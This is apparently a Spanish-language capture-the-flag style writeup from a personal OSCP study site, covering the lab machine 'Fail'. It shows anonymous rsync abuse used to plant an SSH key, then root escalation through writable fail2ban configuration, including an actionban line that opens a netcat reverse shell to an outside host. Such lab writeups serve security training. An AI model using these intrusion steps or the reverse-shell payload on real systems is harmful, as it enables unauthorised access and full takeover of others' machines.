1gnotus
  • WHOAMI
    • Mi camino a la OSCP😘
    • Mi primer Certificación la eJPT
  • HACK THE BOX
    • Page 1
    • Page 2
  • 💻Proving Ground Practice and Play
    • Writeup
      • MAQUINA JORDAK (Web RCE jordani 1.0.0 + PRIVESC 'env')
      • MAQUINA ALGERNON (VULn 'smartermail v6985 RCE')
      • MAQUINA TWIGGY (CMS MEZZANINA RCE VULN ZEROMQ ZMTP o API SALTSTACK 3000.1 'cve 2020 11651')
      • MAQUINA BOOLEAN (Modificacion de REQUEST con Burpsuite ' confirmed = true ' + LFI + UPLOAD ID_RSA an
      • MAQUINA AUTHBYT (FTP anonymous y credenciales por defecto + subida de archvio PHP revershell a FTP
      • MAQUINA CLAMV (VULN SMTP 25 'clamv' Sendmail 8.13 SEARCHSPLOIT)
      • MAQUINA COCKPIT (Gobuster extension php + Blaze CMS 'SQLI BYPASS LOGIN' + UBUNTU WEB + REVERSHELL +
      • MAQUINA CODO (CODOFORUM 5.1 'RCE + UPLOAD IMG.' + LINPEAS)
      • MAQUINA CVE-2023-40582 (Vulnerabilidad de Inyección de Comando en find exec)
      • MAQUINA CVE-2023-46818 (RCE CVE 2023 46818 ispconfig.)
      • MAQUINA DC 2 (Enum Users Wordpress WPSCAN + CEWL wordlists + BruteForce WPSCAN + PRIVESC bin git 'je
      • MAQUINA DETECTION (WEB 'changedetection' port 5000 + VULN RCE 'changedetection RCE')
      • MAQUINA ELECTION1 (Sito web Election 2.0 + PHPmyadmin login + Escalate Priv SERV U)
      • MAQUINA DVR4 (web 'Argus Surveillance DVR version 4.0.0.0' + Vuln 'Argus Surveillance DVR DIRECTORY
      • MAQUINA EXFILTRED Subrion CMS v4.2.1 File Upload Bypass to RCE (Authenticated) UPLOAD PHAR 'CMD' PRI
      • MAQUINA FAIL (ENUM RSYNC 'PUERTO 873' + SSH- KEYGEN + PREVISEC 'GROUP FAIL2BAIN')
      • MAQUINA FANTASTIC (GRAFANA 8.3 'vuln lfi' + PROMETHEUS 2.32 + ESCALATE PRIV 'group DISK = root + ID_
      • MAQUINA FUNYBOX (CSE BOOKSTORE 1.0 Vuln rce no autenticado PRIVESC pkexec 'sudo l' extra bypass login SMALL CRM ADMIN 3.0)
      • MAQUINA INTERNAL (WINDOWS SERVER 2008 + CVE 2009 3103 + METERPRETER RCE)
      • MAQUINA HUB ( Enum web port 8082 + FUGUHUB + injeccion revershell en LUA)
      • MAQUINA KEVIN (VULN HP POWER MANAGER 'admin admin' Metasploit PrivEsc 'hp manager filename' Metasploit BufferOverflow 'MANUAL')
      • MAQUINA LEVRAM (Exploit GERAPY 0.9.6 RCE searchsploit + PRIVESC 'CAPABILITES python3.10')
      • MAQUINA MEDJED (WEBDAV BarracudaDrive 6.5 + Revershell .php creado con msfvenom + PrivEsc local barracudadrive 6.5)
      • MAQUINA NUKEM (WORDPRESS 5.5.1 ABUSED PLUGINS SIMPLE LIST 4.4.2 PIVOTING USER MYSQL PASSOWORD PIVOTING PUERTO Y TUNELIZACION SSH PRIVESC 'DOSBOX' CAMBIO DE PERMISOS SUDOERS CON REMMINA)
      • MAQUINA PASS (FlatPass 1.2 Vuln 'file upload bypass RCE' Privesc 'apt get')
      • MAQUINA PELICAN (RCE ZooKeeper v1 Web UI + RCE + PrivEsc 'gcore pid + extract password 'strings' = root)
      • MAQUINA RAY PROJECT CVE 2023 6019 (COMMANDO INJECTION RAY PROJECT)
      • MAQUINA SHENZI (Enum SMB 'nullsesion' + Directory Web = Nombre del recurso compartido + WORDPRESS RC
      • MAQUINA BRATARINA (SMB null session + RCE 'OPENSMTPD 2.0.0') + (MODIFICACION passwd 'agregar password' + Subscribir archivo etc passwd)
      • MAQUINA SQUID (web proxy SQUID 4.14 + 'RCE UPLOAD script' PHPMYADMIN 5.0.2)
      • MAQUINA PC (PortForwarding port 65432 - PrivEsc 0-day 2022 rpc.py)
      • MAQUINA FUNBOXEASY (Enum directory - RCE .php - Pivoting User - PrivEsc SUDO-L)
      • MAQUINA SLORT (Enum de directorios Acceso a la maquina con LFI and RCI PrivEsc Auto Elevated Executable Hijacking)
      • MAQUINA PASSPORT (Enum Directorios ss2john id rsa PrivEsc Creacion de archivo con permisos SUID)
      • MAQUINA PYLOADER (pyload 0.5.0 Rce No autenticado)
      • MAQUINA HUTCH (Netexec LDAP enum - PrivEsc Netexec DUMP Laps)
      • MAQUINA GAARA (Brute Force SSH PrivEsc 'gdb' gtfobins)
  • 🥸CHEET-SEET
    • CheetSeet WPSCAN
  • 🐋DOCKERLABS
    • Writeup
      • MAQUINA WALKINGCMS
      • MAQUINA PN (EXPLOIT UPLOAD .WAR TOMCAT - RCE 'MSFVENOM')
  • 👺Road-to-BSCP
    • Page 4
  • 🖥️THEHACKLABS
    • Writeups
      • MAQUINA TORRIJAS(CMS WORDPRESS 6.7.2, WPSCAN PLUGINS 'WP DIRECTORY FREE 1.7.9 LocalFileInclusion PRIVESC bpftrace)
      • MAQUINA FACULTAD (Enum WPSCAN - wordpress UPLOAD RCE WP-FILE-MANAGER - PrivEsc SUDO -L RCE)
Powered by GitBook
On this page
  1. Proving Ground Practice and Play
  2. Writeup

MAQUINA FAIL (ENUM RSYNC 'PUERTO 873' + SSH- KEYGEN + PREVISEC 'GROUP FAIL2BAIN')

PreviousMAQUINA EXFILTRED Subrion CMS v4.2.1 File Upload Bypass to RCE (Authenticated) UPLOAD PHAR 'CMD' PRINextMAQUINA FANTASTIC (GRAFANA 8.3 'vuln lfi' + PROMETHEUS 2.32 + ESCALATE PRIV 'group DISK = root + ID_

Last updated 1 month ago

Realizo un escaneo de puertos con nmap para ver los puertos abiertos, los servicios y las versiones de estos.

nmap -sC -sV -p 'puertos' 'ip' -oN fullscan.txt

El escaneo me encontró 2 puertos interesantes el 22 ssh y el 873 rsync.

Como no tengo credenciales dejo de lado el puerto 22 y me concentro en el puerto 873. Con nmap ejecute un script el cual me recopila un poco de información.

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>

Este script me muestra que tengo un usuario llamado fox y al parecer estaría el directorio home.

Con el siguiente comando voy a poder listar de forma anónima el directorio donde se encuentra fox.

rsync -av --list-only rsync://192.168.0.123/fox

Puedo ver que tengo varias carpetas, ahora lo bueno que tiene rsync es que puedo descargarme o traerme estos archivos a mi directorio de trabajo con el siguiente comando.

rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared

Estos archivos no contenían nada interesante, luego de una busqueda tambien puedo realizar subida de archivos, asi que intente cargar un archivo.txt.

rsync -av hola.txt rsync://fox@192.168.169.126/fox

Ahora que subí con exito el mi archivo lo que hize fue realizar la subida de archivos de mi id_rsa publica para tener acceso como fox.

Lo primero fue crear mi id_rsa con ssh-keygen.

Luego cree una carpeta llamada .ssh en el directorio /tmp, seguido copie la id_rsa.publica al directorio /tmp.ssh pero como el nombre de authorized_keys.

A la carpeta /tmp/.ssh la subo completa a la maquina victima con el comando utilizado anteriormente.

Ya subido el archivo a través del ssh como usuario fox me logue y ya estoy dentro de la maquina como usuario fox.

Ya dentro voy a realice un reconocimiento de la maquina para ver a lo que me estoy enfrentando.

Como solo tengo un usuario aparte del root, voy a buscar la forma de escalar privilegios para acceder como usuario root.

En este caso probé utilizando sudo -l pero no hizo nada, luego busque permisos SUID encontrando lo siguiente.

Al verificar el ID me tope con un grupo interesante que tiene permisos de root '1000' llamado fail2ban.

Buscando en google encontré que puedo aprovechar unas malas configuraciones para poder realizar la escalada de privilegios.

Lo primero que hice fue buscar archivos que tenga permisos de lectura y me tope con varios archivos pertenecientes a ese grupo.

Luego voy al directorio donde están estos archivos y listo completo la carpeta observando que tengo permisos de escritura también en todos los archivos.

Como dije anteriormente encontré la forma de escalar privielegios abusando de unas malas configuraciones de estos archivos, para ello realizo lo siguiente.

# Copio **iptables-multiport.conf** al directorio de inicio del usuario actual. cp /etc/fail2ban/action.d/iptables-multiport.conf ~

# Ahora modifique el archivo. nano ~/iptables-multiport.conf

#Insertamos una carga útil de shell inverso en el **actionban**. actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash

#Luego, vuelva el archivo de configuración al original.

mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf

Terminado de realizar estos pasos lo que hize fue utilizar hydra para realizar fuerza bruta al ssh.

Listo ahora somos root.

💻
https://es.wikipedia.org/wiki/Fail2ban
https://exploit-notes.hdks.org/exploit/network/rsync-pentesting/
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-
privilege-escalation/